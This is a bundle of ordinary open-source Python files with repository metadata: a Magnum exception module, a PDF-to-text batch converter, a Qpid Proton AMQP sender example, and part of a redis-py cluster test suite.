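# Keystone client errors raised inside get_trust surface as magnum's
# AuthorizationFailure.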
class MagnumException(Exception):
"""Base Magnum Exception
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
code = 500
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if 'code' not in self.kwargs:
try:
self.kwargs['code'] = self.code
except AttributeError:
pass
if message:
self.message = message
try:
self.message = self.message % kwargs
except Exception as e:
# kwargs doesn't match a variable in the message
# log the issue and the kwargs
LOG.exception(_LE('Exception in string format operation'))
for name, value in kwargs.items():
LOG.error(_LE("%(name)s: %(value)s") %
{'name': name, 'value': value})
try:
if CONF.fatal_exception_format_errors:
raise e
except cfg.NoSuchOptError:
# Note: work around for Bug: #1447873
if CONF.oslo_versionedobjects.fatal_exception_format_errors:
raise e
super(MagnumException, self).__init__(self.message)
def __str__(self):
if six.PY3:
return self.message
return self.message.encode('utf-8')
def __unicode__(self):
return self.message
def format_message(self):
if self.__class__.__name__.endswith('_Remote'):
return self.args[0]
else:
return six.text_type(self)
class ObjectNotFound(MagnumException):
message = _("The %(name)s %(id)s could not be found.")
class ObjectNotUnique(MagnumException):
message = _("The %(name)s already exists.")
class ResourceNotFound(ObjectNotFound):
message = _("The %(name)s resource %(id)s could not be found.")
code = 404
class ResourceExists(ObjectNotUnique):
message = _("The %(name)s resource already exists.")
code = 409
class AuthorizationFailure(MagnumException):
message = _("%(client)s connection failed. %(message)s")
class UnsupportedObjectError(MagnumException):
message = _('Unsupported object type %(objtype)s')
class IncompatibleObjectVersion(MagnumException):
message = _('Version %(objver)s of %(objname)s is not supported')
class OrphanedObjectError(MagnumException):
message = _('Cannot call %(method)s on orphaned %(objtype)s object')
class Invalid(MagnumException):
message = _("Unacceptable parameters.")
code = 400
class InvalidUUID(Invalid):
message = _("Expected a uuid but received %(uuid)s.")
class InvalidName(Invalid):
message = _("Expected a name but received %(uuid)s.")
class InvalidUuidOrName(Invalid):
message = _("Expected a name or uuid but received %(uuid)s.")
class InvalidIdentity(Invalid):
message = _("Expected an uuid or int but received %(identity)s.")
class HTTPNotFound(ResourceNotFound):
pass
class Conflict(MagnumException):
message = _('Conflict.')
code = 409
class InvalidState(Conflict):
message = _("Invalid resource state.")
# Cannot be templated as the error syntax varies.
# msg needs to be constructed when raised.
class InvalidParameterValue(Invalid):
message = _("%(err)s")
class InstanceAssociated(Conflict):
message = _("Instance %(instance_uuid)s is already associated with a node,"
" it cannot be associated with this other node %(node)s")
class InstanceNotFound(ResourceNotFound):
message = _("Instance %(instance)s could not be found.")
class PatchError(Invalid):
message = _("Couldn't apply patch '%(patch)s'. Reason: %(reason)s")
class NotAuthorized(MagnumException):
message = _("Not authorized.")
code = 403
class NotAcceptable(MagnumException):
# TODO(yuntongjin): We need to set response headers
# in the API for this exception
message = _("Request not acceptable.")
code = 406
class InvalidMAC(Invalid):
message = _("Expected a MAC address but received %(mac)s.")
class ConfigInvalid(MagnumException):
message = _("Invalid configuration file. %(error_msg)s")
class NodeAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class NodeNotFound(ResourceNotFound):
message = _("Node %(node)s could not be found.")
class NodeAssociated(InvalidState):
message = _("Node %(node)s is associated with instance %(instance)s.")
class SSHConnectFailed(MagnumException):
message = _("Failed to establish SSH connection to host %(host)s.")
class FileSystemNotSupported(MagnumException):
message = _("Failed to create a file system. "
"File system %(fs)s is not supported.")
class BayModelNotFound(ResourceNotFound):
message = _("Baymodel %(baymodel)s could not be found.")
class BayModelAlreadyExists(Conflict):
message = _("A baymodel with UUID %(uuid)s already exists.")
class BayModelReferenced(Invalid):
message = _("Baymodel %(baymodel)s is referenced by one or multiple bays.")
class BayNotFound(ResourceNotFound):
message = _("Bay %(bay)s could not be found.")
class BayAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class ContainerNotFound(ResourceNotFound):
message = _("Container %(container)s could not be found.")
class ContainerAlreadyExists(Conflict):
message = _("A container with UUID %(uuid)s already exists.")
class PodNotFound(ResourceNotFound):
message = _("Pod %(pod)s could not be found.")
class PodAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class ReplicationControllerNotFound(ResourceNotFound):
message = _("ReplicationController %(rc)s could not be found.")
class ReplicationControllerAlreadyExists(Conflict):
message = _("A ReplicationController with UUID %(uuid)s already exists.")
class ServiceNotFound(ResourceNotFound):
message = _("Service %(service)s could not be found.")
class ServiceAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class ContainerException(Exception):
pass
class NotSupported(MagnumException):
message = _("%(operation)s is not supported.")
code = 400
class BayTypeNotSupported(MagnumException):
message = _("Bay type (%(server_type)s, %(os)s, %(coe)s)"
" not supported.")
class BayTypeNotEnabled(MagnumException):
message = _("Bay type (%(server_type)s, %(os)s, %(coe)s)"
" not enabled.")
class RequiredParameterNotProvided(MagnumException):
message = _("Required parameter %(heat_param)s not provided.")
class Urllib2InvalidScheme(MagnumException):
message = _("The urllib2 URL %(url) has an invalid scheme.")
class OperationInProgress(Invalid):
message = _("Bay %(bay_name)s already has an operation in progress.")
class ImageNotFound(ResourceNotFound):
message = _("Image %(image_id)s could not be found.")
class ImageNotAuthorized(MagnumException):
message = _("Not authorized for image %(image_id)s.")
class OSDistroFieldNotFound(ResourceNotFound):
message = _("Image %(image_id)s doesn't contain os_distro field.")
class KubernetesAPIFailed(MagnumException):
def __init__(self, message=None, **kwargs):
self.__class__.code = kwargs.get('code')
super(KubernetesAPIFailed, self).__init__(message, **kwargs)
|
{
"content_hash": "611da3a1cd6fd19c24e914ab1cbac9d7",
"timestamp": "",
"source": "github",
"line_count": 450,
"max_line_length": 79,
"avg_line_length": 30.13111111111111,
"alnum_prop": 0.6267423851316469,
"repo_name": "paulczar/magnum",
"id": "7585d7abfbb08f3e80b01f7367aa03f28da13137",
"size": "14139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "magnum/common/exception.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "569"
},
{
"name": "Mako",
"bytes": "349"
},
{
"name": "Python",
"bytes": "1685855"
},
{
"name": "Shell",
"bytes": "22511"
}
],
"symlink_target": ""
}
|
from pdf2txt import pdfTotxt1, pdfTotxt2
import os
def handleStock(stock_dir, dir, root_txt_path):
for stock in stock_dir:
years_dir=os.listdir(dir+stock)
for y in years_dir:
type_dir=os.listdir(dir+stock+'/'+y)
for t in type_dir:
report_dir=os.listdir(dir+stock+'/'+y+'/'+t)
root_txt=root_txt_path+stock+'_'+y+'_'+t+'_Chairman Statement.txt'
if os.path.exists(root_txt):
continue
for r in report_dir:
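                    # Try the primary extractor first and fall back to
                    # the alternative parser when a PDF trips it up.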
try:
pdfTotxt1(dir+stock+'/'+y+'/'+t+'/'+r, root_txt)
except:
pdfTotxt2(dir+stock+'/'+y+'/'+t+'/'+r, root_txt)
if __name__=='__main__':
root_txt_path='/home/luowang/data/financial reports/demo_68_txt/'
if not os.path.exists(root_txt_path):
os.mkdir(root_txt_path)
root_pdf_path='/home/luowang/data/financial reports/demo_68_test/'
if os.path.exists(root_pdf_path):
stock_dir=os.listdir(root_pdf_path)
handleStock(stock_dir, root_pdf_path, root_txt_path)
|
{
"content_hash": "b615c282018919f539128c929bb9e416",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 82,
"avg_line_length": 35.59375,
"alnum_prop": 0.5329236172080772,
"repo_name": "FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code",
"id": "e14d3f3318c4426d75cebd97e87fd9621811ddec",
"size": "1139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "luowang/All_PDF_to_txt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "6065"
},
{
"name": "Jupyter Notebook",
"bytes": "118087"
},
{
"name": "Perl",
"bytes": "24665"
},
{
"name": "Python",
"bytes": "772916"
},
{
"name": "Shell",
"bytes": "7125"
}
],
"symlink_target": ""
}
|
from __future__ import print_function, unicode_literals
import optparse
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
class Send(MessagingHandler):
def __init__(self, url, messages):
super(Send, self).__init__()
self.url = url
self.sent = 0
self.confirmed = 0
self.messages = messages
def on_start(self, event):
event.container.create_sender(self.url)
def on_sendable(self, event):
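        # Send only while the peer has granted link credit and unsent
        # messages remain.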
while event.sender.credit and self.sent < len(self.messages):
msg = Message(body=u"%s" % self.messages[self.sent])
event.sender.send(msg)
self.sent += 1
def on_accepted(self, event):
self.confirmed += 1
if self.confirmed == len(self.messages):
print("all messages confirmed")
event.connection.close()
def on_disconnected(self, event):
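        # Rewind the sent counter so unconfirmed messages are re-sent
        # after reconnecting.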
self.sent = self.confirmed
parser = optparse.OptionParser(usage="usage: %prog [options]",
description="Send messages to the supplied address.")
parser.add_option("-a", "--address", default="localhost:5672/examples",
help="address to which messages are sent (default %default)")
opts, args = parser.parse_args()
try:
Container(Send(opts.address, args)).run()
except KeyboardInterrupt: pass
|
{
"content_hash": "41aa0c11eb843a14ab02ee0076046599",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 84,
"avg_line_length": 33.8780487804878,
"alnum_prop": 0.6371490280777538,
"repo_name": "grs/amqp_subscriptions",
"id": "ded0af56df9574fa97c578c7e2e4436164b9c089",
"size": "2201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "send.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "31704"
}
],
"symlink_target": ""
}
|
import binascii
import datetime
import warnings
from time import sleep
from unittest.mock import DEFAULT, Mock, call, patch
import pytest
from redis import Redis
from redis.cluster import (
PRIMARY,
REDIS_CLUSTER_HASH_SLOTS,
REPLICA,
ClusterNode,
NodesManager,
RedisCluster,
get_node_name,
)
from redis.commands import CommandsParser
from redis.connection import Connection
from redis.crc import key_slot
from redis.exceptions import (
AskError,
ClusterDownError,
ConnectionError,
DataError,
MovedError,
NoPermissionError,
RedisClusterException,
RedisError,
ResponseError,
)
from redis.utils import str_if_bytes
from tests.test_pubsub import wait_for_message
from .conftest import (
_get_client,
skip_if_redis_enterprise,
skip_if_server_version_lt,
skip_unless_arch_bits,
wait_for_command,
)
default_host = "127.0.0.1"
default_port = 7000
default_cluster_slots = [
[
0,
8191,
["127.0.0.1", 7000, "node_0"],
["127.0.0.1", 7003, "node_3"],
],
[8192, 16383, ["127.0.0.1", 7001, "node_1"], ["127.0.0.1", 7002, "node_2"]],
]
@pytest.fixture()
def slowlog(request, r):
"""
Set the slowlog threshold to 0, and the
max length to 128. This will force every
command into the slowlog and allow us
to test it
"""
# Save old values
current_config = r.config_get(target_nodes=r.get_primaries()[0])
old_slower_than_value = current_config["slowlog-log-slower-than"]
    old_max_length_value = current_config["slowlog-max-len"]
# Function to restore the old values
def cleanup():
r.config_set("slowlog-log-slower-than", old_slower_than_value)
r.config_set("slowlog-max-len", old_max_legnth_value)
request.addfinalizer(cleanup)
# Set the new values
r.config_set("slowlog-log-slower-than", 0)
r.config_set("slowlog-max-len", 128)
def get_mocked_redis_client(func=None, *args, **kwargs):
"""
    Return a stable RedisCluster object that has deterministic
nodes and slots setup to remove the problem of different IP addresses
on different installations and machines.
"""
cluster_slots = kwargs.pop("cluster_slots", default_cluster_slots)
coverage_res = kwargs.pop("coverage_result", "yes")
cluster_enabled = kwargs.pop("cluster_enabled", True)
with patch.object(Redis, "execute_command") as execute_command_mock:
def execute_command(*_args, **_kwargs):
if _args[0] == "CLUSTER SLOTS":
mock_cluster_slots = cluster_slots
return mock_cluster_slots
elif _args[0] == "COMMAND":
return {"get": [], "set": []}
elif _args[0] == "INFO":
return {"cluster_enabled": cluster_enabled}
elif len(_args) > 1 and _args[1] == "cluster-require-full-coverage":
return {"cluster-require-full-coverage": coverage_res}
elif func is not None:
return func(*args, **kwargs)
else:
return execute_command_mock(*_args, **_kwargs)
execute_command_mock.side_effect = execute_command
with patch.object(
CommandsParser, "initialize", autospec=True
) as cmd_parser_initialize:
def cmd_init_mock(self, r):
self.commands = {
"get": {
"name": "get",
"arity": 2,
"flags": ["readonly", "fast"],
"first_key_pos": 1,
"last_key_pos": 1,
"step_count": 1,
}
}
cmd_parser_initialize.side_effect = cmd_init_mock
return RedisCluster(*args, **kwargs)
def mock_node_resp(node, response):
connection = Mock()
connection.read_response.return_value = response
node.redis_connection.connection = connection
return node
def mock_node_resp_func(node, func):
connection = Mock()
connection.read_response.side_effect = func
node.redis_connection.connection = connection
return node
def mock_all_nodes_resp(rc, response):
for node in rc.get_nodes():
mock_node_resp(node, response)
return rc
def find_node_ip_based_on_port(cluster_client, port):
for node in cluster_client.get_nodes():
if node.port == port:
return node.host
def moved_redirection_helper(request, failover=False):
"""
    Test that the client handles a MOVED response, optionally after a failover.
Redirection after a failover means that the redirection address is of a
replica that was promoted to a primary.
At first call it should return a MOVED ResponseError that will point
the client to the next server it should talk to.
Verify that:
1. it tries to talk to the redirected node
2. it updates the slot's primary to the redirected node
For a failover, also verify:
3. the redirected node's server type updated to 'primary'
4. the server type of the previous slot owner updated to 'replica'
"""
rc = _get_client(RedisCluster, request, flushdb=False)
slot = 12182
redirect_node = None
# Get the current primary that holds this slot
prev_primary = rc.nodes_manager.get_node_from_slot(slot)
if failover:
if len(rc.nodes_manager.slots_cache[slot]) < 2:
            warnings.warn("Skipping this test since it requires a replica")
return
redirect_node = rc.nodes_manager.slots_cache[slot][1]
else:
# Use one of the primaries to be the redirected node
redirect_node = rc.get_primaries()[0]
r_host = redirect_node.host
r_port = redirect_node.port
with patch.object(Redis, "parse_response") as parse_response:
def moved_redirect_effect(connection, *args, **options):
def ok_response(connection, *args, **options):
assert connection.host == r_host
assert connection.port == r_port
return "MOCK_OK"
parse_response.side_effect = ok_response
raise MovedError(f"{slot} {r_host}:{r_port}")
parse_response.side_effect = moved_redirect_effect
assert rc.execute_command("SET", "foo", "bar") == "MOCK_OK"
slot_primary = rc.nodes_manager.slots_cache[slot][0]
assert slot_primary == redirect_node
if failover:
assert rc.get_node(host=r_host, port=r_port).server_type == PRIMARY
assert prev_primary.server_type == REPLICA
@pytest.mark.onlycluster
class TestRedisClusterObj:
"""
Tests for the RedisCluster class
"""
def test_host_port_startup_node(self):
"""
Test that it is possible to use host & port arguments as startup node
args
"""
cluster = get_mocked_redis_client(host=default_host, port=default_port)
assert cluster.get_node(host=default_host, port=default_port) is not None
def test_startup_nodes(self):
"""
Test that it is possible to use startup_nodes
argument to init the cluster
"""
port_1 = 7000
port_2 = 7001
startup_nodes = [
ClusterNode(default_host, port_1),
ClusterNode(default_host, port_2),
]
cluster = get_mocked_redis_client(startup_nodes=startup_nodes)
assert (
cluster.get_node(host=default_host, port=port_1) is not None
and cluster.get_node(host=default_host, port=port_2) is not None
)
def test_empty_startup_nodes(self):
"""
        Test that an exception is raised when providing empty startup_nodes
"""
with pytest.raises(RedisClusterException) as ex:
RedisCluster(startup_nodes=[])
assert str(ex.value).startswith(
"RedisCluster requires at least one node to discover the " "cluster"
), str_if_bytes(ex.value)
def test_from_url(self, r):
redis_url = f"redis://{default_host}:{default_port}/0"
with patch.object(RedisCluster, "from_url") as from_url:
def from_url_mocked(_url, **_kwargs):
return get_mocked_redis_client(url=_url, **_kwargs)
from_url.side_effect = from_url_mocked
cluster = RedisCluster.from_url(redis_url)
assert cluster.get_node(host=default_host, port=default_port) is not None
def test_execute_command_errors(self, r):
"""
        Test that an exception is raised if no key is provided.
"""
with pytest.raises(RedisClusterException) as ex:
r.execute_command("GET")
assert str(ex.value).startswith(
"No way to dispatch this command to " "Redis Cluster. Missing key."
)
def test_execute_command_node_flag_primaries(self, r):
"""
Test command execution with nodes flag PRIMARIES
"""
primaries = r.get_primaries()
replicas = r.get_replicas()
mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.PRIMARIES) is True
for primary in primaries:
conn = primary.redis_connection.connection
assert conn.read_response.called is True
for replica in replicas:
conn = replica.redis_connection.connection
assert conn.read_response.called is not True
def test_execute_command_node_flag_replicas(self, r):
"""
Test command execution with nodes flag REPLICAS
"""
        replicas = r.get_replicas()
        if not replicas:
            # The mocked client's default topology includes replicas
            r = get_mocked_redis_client(host=default_host, port=default_port)
            replicas = r.get_replicas()
        primaries = r.get_primaries()
mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.REPLICAS) is True
for replica in replicas:
conn = replica.redis_connection.connection
assert conn.read_response.called is True
for primary in primaries:
conn = primary.redis_connection.connection
assert conn.read_response.called is not True
def test_execute_command_node_flag_all_nodes(self, r):
"""
Test command execution with nodes flag ALL_NODES
"""
mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.ALL_NODES) is True
for node in r.get_nodes():
conn = node.redis_connection.connection
assert conn.read_response.called is True
def test_execute_command_node_flag_random(self, r):
"""
Test command execution with nodes flag RANDOM
"""
mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.RANDOM) is True
called_count = 0
for node in r.get_nodes():
conn = node.redis_connection.connection
if conn.read_response.called is True:
called_count += 1
assert called_count == 1
def test_execute_command_default_node(self, r):
"""
        Test that a command executed without a node flag runs on the
        default node
"""
def_node = r.get_default_node()
mock_node_resp(def_node, "PONG")
assert r.ping() is True
conn = def_node.redis_connection.connection
assert conn.read_response.called
def test_ask_redirection(self, r):
"""
        Test that the client handles an ASK response.
        On the first call, it should return an ASK ResponseError that points
        the client to the next server it should talk to.
        The important thing to verify is that it tries to talk to the second node.
"""
redirect_node = r.get_nodes()[0]
with patch.object(Redis, "parse_response") as parse_response:
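            # Same pattern as moved_redirection_helper: the first call raises
            # ASK and swaps the side effect, so the retried command is
            # answered by ok_response on the redirected node.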
def ask_redirect_effect(connection, *args, **options):
def ok_response(connection, *args, **options):
assert connection.host == redirect_node.host
assert connection.port == redirect_node.port
return "MOCK_OK"
parse_response.side_effect = ok_response
raise AskError(f"12182 {redirect_node.host}:{redirect_node.port}")
parse_response.side_effect = ask_redirect_effect
assert r.execute_command("SET", "foo", "bar") == "MOCK_OK"
def test_moved_redirection(self, request):
"""
Test that the client handles MOVED response.
"""
moved_redirection_helper(request, failover=False)
def test_moved_redirection_after_failover(self, request):
"""
Test that the client handles MOVED response after a failover.
"""
moved_redirection_helper(request, failover=True)
def test_refresh_using_specific_nodes(self, request):
"""
Test making calls on specific nodes when the cluster has failed over to
another node
"""
node_7006 = ClusterNode(host=default_host, port=7006, server_type=PRIMARY)
node_7007 = ClusterNode(host=default_host, port=7007, server_type=PRIMARY)
with patch.object(Redis, "parse_response") as parse_response:
with patch.object(NodesManager, "initialize", autospec=True) as initialize:
with patch.multiple(
Connection, send_command=DEFAULT, connect=DEFAULT, can_read=DEFAULT
) as mocks:
# simulate 7006 as a failed node
def parse_response_mock(connection, command_name, **options):
if connection.port == 7006:
parse_response.failed_calls += 1
raise ClusterDownError(
"CLUSTERDOWN The cluster is "
"down. Use CLUSTER INFO for "
"more information"
)
elif connection.port == 7007:
parse_response.successful_calls += 1
                    def initialize_mock(self):
                        # start with all 16384 hash slots mapped to 7006
                        self.nodes_cache = {node_7006.name: node_7006}
                        self.default_node = node_7006
                        self.slots_cache = {}
                        for i in range(0, 16384):
                            self.slots_cache[i] = [node_7006]
# After the first connection fails, a reinitialize
# should follow the cluster to 7007
                    def map_7007(self):
                        self.nodes_cache = {node_7007.name: node_7007}
                        self.default_node = node_7007
                        self.slots_cache = {}
                        for i in range(0, 16384):
                            self.slots_cache[i] = [node_7007]
# Change initialize side effect for the second call
initialize.side_effect = map_7007
parse_response.side_effect = parse_response_mock
parse_response.successful_calls = 0
parse_response.failed_calls = 0
initialize.side_effect = initialize_mock
mocks["can_read"].return_value = False
mocks["send_command"].return_value = "MOCK_OK"
mocks["connect"].return_value = None
with patch.object(
CommandsParser, "initialize", autospec=True
) as cmd_parser_initialize:
def cmd_init_mock(self, r):
self.commands = {
"get": {
"name": "get",
"arity": 2,
"flags": ["readonly", "fast"],
"first_key_pos": 1,
"last_key_pos": 1,
"step_count": 1,
}
}
cmd_parser_initialize.side_effect = cmd_init_mock
rc = _get_client(RedisCluster, request, flushdb=False)
assert len(rc.get_nodes()) == 1
assert rc.get_node(node_name=node_7006.name) is not None
rc.get("foo")
# Cluster should now point to 7007, and there should be
# one failed and one successful call
assert len(rc.get_nodes()) == 1
assert rc.get_node(node_name=node_7007.name) is not None
assert rc.get_node(node_name=node_7006.name) is None
assert parse_response.failed_calls == 1
assert parse_response.successful_calls == 1
def test_reading_from_replicas_in_round_robin(self):
with patch.multiple(
Connection,
send_command=DEFAULT,
read_response=DEFAULT,
_connect=DEFAULT,
can_read=DEFAULT,
on_connect=DEFAULT,
) as mocks:
with patch.object(Redis, "parse_response") as parse_response:
def parse_response_mock_first(connection, *args, **options):
# Primary
assert connection.port == 7001
parse_response.side_effect = parse_response_mock_second
return "MOCK_OK"
def parse_response_mock_second(connection, *args, **options):
# Replica
assert connection.port == 7002
parse_response.side_effect = parse_response_mock_third
return "MOCK_OK"
def parse_response_mock_third(connection, *args, **options):
# Primary
assert connection.port == 7001
return "MOCK_OK"
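                    # The chained side effects assert the expected rotation for
                    # slot 12182: primary (7001) -> replica (7002) -> primary.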
# We don't need to create a real cluster connection but we
# do want RedisCluster.on_connect function to get called,
# so we'll mock some of the Connection's functions to allow it
parse_response.side_effect = parse_response_mock_first
mocks["send_command"].return_value = True
mocks["read_response"].return_value = "OK"
mocks["_connect"].return_value = True
mocks["can_read"].return_value = False
mocks["on_connect"].return_value = True
# Create a cluster with reading from replications
read_cluster = get_mocked_redis_client(
host=default_host, port=default_port, read_from_replicas=True
)
assert read_cluster.read_from_replicas is True
                # Check that we read from the slot's nodes in a round robin
                # manner.
# 'foo' belongs to slot 12182 and the slot's nodes are:
# [(127.0.0.1,7001,primary), (127.0.0.1,7002,replica)]
read_cluster.get("foo")
read_cluster.get("foo")
read_cluster.get("foo")
mocks["send_command"].assert_has_calls([call("READONLY")])
def test_keyslot(self, r):
"""
Test that method will compute correct key in all supported cases
"""
assert r.keyslot("foo") == 12182
assert r.keyslot("{foo}bar") == 12182
assert r.keyslot("{foo}") == 12182
assert r.keyslot(1337) == 4314
assert r.keyslot(125) == r.keyslot(b"125")
assert r.keyslot(125) == r.keyslot("\x31\x32\x35")
assert r.keyslot("大奖") == r.keyslot(b"\xe5\xa4\xa7\xe5\xa5\x96")
assert r.keyslot("大奖") == r.keyslot(b"\xe5\xa4\xa7\xe5\xa5\x96")
assert r.keyslot(1337.1234) == r.keyslot("1337.1234")
assert r.keyslot(1337) == r.keyslot("1337")
assert r.keyslot(b"abc") == r.keyslot("abc")
def test_get_node_name(self):
assert (
get_node_name(default_host, default_port)
== f"{default_host}:{default_port}"
)
def test_all_nodes(self, r):
"""
        Set a list of nodes and it should be possible to iterate over all of them
"""
nodes = [node for node in r.nodes_manager.nodes_cache.values()]
        for node in r.get_nodes():
assert node in nodes
def test_all_nodes_masters(self, r):
"""
        Set a list of nodes with random primaries/replicas config and it should
        be possible to iterate over all of them.
"""
nodes = [
node
for node in r.nodes_manager.nodes_cache.values()
if node.server_type == PRIMARY
]
for node in r.get_primaries():
assert node in nodes
@pytest.mark.parametrize("error", RedisCluster.ERRORS_ALLOW_RETRY)
def test_cluster_down_overreaches_retry_attempts(self, error):
"""
        When an error that allows retry is thrown, test that we retry executing
        the command as many times as configured in cluster_error_retry_attempts
        and then raise the exception
"""
with patch.object(RedisCluster, "_execute_command") as execute_command:
def raise_error(target_node, *args, **kwargs):
execute_command.failed_calls += 1
raise error("mocked error")
execute_command.side_effect = raise_error
rc = get_mocked_redis_client(host=default_host, port=default_port)
with pytest.raises(error):
rc.get("bar")
assert execute_command.failed_calls == rc.cluster_error_retry_attempts
def test_user_on_connect_function(self, request):
"""
        Test support for passing a user-supplied on_connect function
"""
def on_connect(connection):
assert connection is not None
mock = Mock(side_effect=on_connect)
_get_client(RedisCluster, request, redis_connect_func=mock)
assert mock.called is True
def test_set_default_node_success(self, r):
"""
test successful replacement of the default cluster node
"""
default_node = r.get_default_node()
# get a different node
new_def_node = None
for node in r.get_nodes():
if node != default_node:
new_def_node = node
break
assert r.set_default_node(new_def_node) is True
assert r.get_default_node() == new_def_node
def test_set_default_node_failure(self, r):
"""
test failed replacement of the default cluster node
"""
default_node = r.get_default_node()
new_def_node = ClusterNode("1.1.1.1", 1111)
assert r.set_default_node(None) is False
assert r.set_default_node(new_def_node) is False
assert r.get_default_node() == default_node
def test_get_node_from_key(self, r):
"""
Test that get_node_from_key function returns the correct node
"""
key = "bar"
slot = r.keyslot(key)
slot_nodes = r.nodes_manager.slots_cache.get(slot)
primary = slot_nodes[0]
assert r.get_node_from_key(key, replica=False) == primary
replica = r.get_node_from_key(key, replica=True)
if replica is not None:
assert replica.server_type == REPLICA
assert replica in slot_nodes
@skip_if_redis_enterprise()
def test_not_require_full_coverage_cluster_down_error(self, r):
"""
        When require_full_coverage is set to False (default client config) and
        not all slots are covered, if one of the nodes has the
        'cluster-require-full-coverage' config set to 'yes', some key-based
        commands should throw ClusterDownError
"""
node = r.get_node_from_key("foo")
missing_slot = r.keyslot("foo")
assert r.set("foo", "bar") is True
try:
assert all(r.cluster_delslots(missing_slot))
with pytest.raises(ClusterDownError):
r.exists("foo")
finally:
try:
# Add back the missing slot
assert r.cluster_addslots(node, missing_slot) is True
# Make sure we are not getting ClusterDownError anymore
assert r.exists("foo") == 1
except ResponseError as e:
if f"Slot {missing_slot} is already busy" in str(e):
# It can happen if the test failed to delete this slot
pass
else:
raise e
@pytest.mark.onlycluster
class TestClusterRedisCommands:
"""
Tests for RedisCluster unique commands
"""
def test_case_insensitive_command_names(self, r):
assert (
r.cluster_response_callbacks["cluster slots"]
== r.cluster_response_callbacks["CLUSTER SLOTS"]
)
def test_get_and_set(self, r):
# get and set can't be tested independently of each other
assert r.get("a") is None
byte_string = b"value"
integer = 5
unicode_string = chr(3456) + "abcd" + chr(3421)
assert r.set("byte_string", byte_string)
assert r.set("integer", 5)
assert r.set("unicode_string", unicode_string)
assert r.get("byte_string") == byte_string
assert r.get("integer") == str(integer).encode()
assert r.get("unicode_string").decode("utf-8") == unicode_string
def test_mget_nonatomic(self, r):
assert r.mget_nonatomic([]) == []
assert r.mget_nonatomic(["a", "b"]) == [None, None]
r["a"] = "1"
r["b"] = "2"
r["c"] = "3"
assert r.mget_nonatomic("a", "other", "b", "c") == [b"1", None, b"2", b"3"]
def test_mset_nonatomic(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
assert r.mset_nonatomic(d)
for k, v in d.items():
assert r[k] == v
def test_config_set(self, r):
assert r.config_set("slowlog-log-slower-than", 0)
def test_cluster_config_resetstat(self, r):
r.ping(target_nodes="all")
all_info = r.info(target_nodes="all")
prior_commands_processed = -1
for node_info in all_info.values():
prior_commands_processed = node_info["total_commands_processed"]
assert prior_commands_processed >= 1
r.config_resetstat(target_nodes="all")
all_info = r.info(target_nodes="all")
for node_info in all_info.values():
reset_commands_processed = node_info["total_commands_processed"]
assert reset_commands_processed < prior_commands_processed
def test_client_setname(self, r):
node = r.get_random_node()
r.client_setname("redis_py_test", target_nodes=node)
client_name = r.client_getname(target_nodes=node)
assert client_name == "redis_py_test"
def test_exists(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.exists(*d.keys()) == len(d)
def test_delete(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.delete(*d.keys()) == len(d)
assert r.delete(*d.keys()) == 0
def test_touch(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.touch(*d.keys()) == len(d)
def test_unlink(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.unlink(*d.keys()) == len(d)
# Unlink is non-blocking so we sleep before
# verifying the deletion
sleep(0.1)
assert r.unlink(*d.keys()) == 0
def test_pubsub_channels_merge_results(self, r):
nodes = r.get_nodes()
channels = []
pubsub_nodes = []
        for i, node in enumerate(nodes):
channel = f"foo{i}"
# We will create different pubsub clients where each one is
# connected to a different node
p = r.pubsub(node)
pubsub_nodes.append(p)
p.subscribe(channel)
b_channel = channel.encode("utf-8")
channels.append(b_channel)
# Assert that each node returns only the channel it subscribed to
sub_channels = node.redis_connection.pubsub_channels()
if not sub_channels:
# Try again after a short sleep
sleep(0.3)
sub_channels = node.redis_connection.pubsub_channels()
assert sub_channels == [b_channel]
# Assert that the cluster's pubsub_channels function returns ALL of
# the cluster's channels
result = r.pubsub_channels(target_nodes="all")
result.sort()
assert result == channels
def test_pubsub_numsub_merge_results(self, r):
nodes = r.get_nodes()
pubsub_nodes = []
channel = "foo"
b_channel = channel.encode("utf-8")
for node in nodes:
# We will create different pubsub clients where each one is
# connected to a different node
p = r.pubsub(node)
pubsub_nodes.append(p)
p.subscribe(channel)
# Assert that each node returns that only one client is subscribed
sub_chann_num = node.redis_connection.pubsub_numsub(channel)
if sub_chann_num == [(b_channel, 0)]:
sleep(0.3)
sub_chann_num = node.redis_connection.pubsub_numsub(channel)
assert sub_chann_num == [(b_channel, 1)]
# Assert that the cluster's pubsub_numsub function returns ALL clients
# subscribed to this channel in the entire cluster
assert r.pubsub_numsub(channel, target_nodes="all") == [(b_channel, len(nodes))]
def test_pubsub_numpat_merge_results(self, r):
nodes = r.get_nodes()
pubsub_nodes = []
pattern = "foo*"
for node in nodes:
# We will create different pubsub clients where each one is
# connected to a different node
p = r.pubsub(node)
pubsub_nodes.append(p)
